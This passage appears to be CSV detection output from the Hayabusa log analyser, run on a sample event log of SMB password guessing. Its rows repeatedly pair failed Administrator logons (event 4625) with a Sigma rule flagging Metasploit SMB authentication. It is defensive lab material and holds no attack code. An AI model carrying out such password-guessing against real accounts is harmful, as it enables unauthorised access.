NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NjFN51w3T4VwuWa5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KG7a88h48ZEyOuYw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ksKuTSGukc5em3B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPEMcGV6ZR92sWNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iBQ6sKrRjb7BsySN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gDFnG1gv7jOeIQ0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QdFKkcNpkfAScnkp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IAYbV4ioewwkZSmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bQ2Dxd6nlgSXJpo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: havLyoVCfdCqzrqO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b2vZLhz19pXrq9iE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4TSN93DrSWb1ah4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QwFyrxiceLRTD9rI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARbqo84Mr5T3ltRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34HpQJO17IDWber9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bSSbqOtdSeH58oIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: EMvTo7fU6J468WE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8gzx6Vr9LoInM1df : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwXC2S4HwdwNE6SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pQa1WxSt3bj9LEv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fm65jq9tRQznmWPh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd8BJbXvEoaDADLc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P0JlFw7S6jFUt4Iy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rfMbFXQcP5sA2wmf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xu4pgyCcDjl9h0Et : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B00w8dZG3sT2Lsqo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8aKGq6qrchp4SLvT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnScYHBCKOSHItsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r8UMBM326M7a4njd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kTdYWOi6p7etRfya : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JWSlcEVzj5lGtVg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xc77wukLTPOYAzj2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4WmTwTGuwDN6YXn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeN4cSffFA04oOje : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eYFPV1kGALqX8jyO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIlhxT4qqo5bCsU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: btoOskH0112h7MTO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWUhQJBcS7XbMJUq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E70qmXDDWqmWJjyU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oX0L8wf6nt2grLvn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0D8BwniiXsjfkYqE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSWYo4mphuvKHQHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: im8an1mDle9f8skd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aOyLWd5CAAjnJt3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7gI55uWlshCLw3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l7UogJ8bBw6Epbht : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
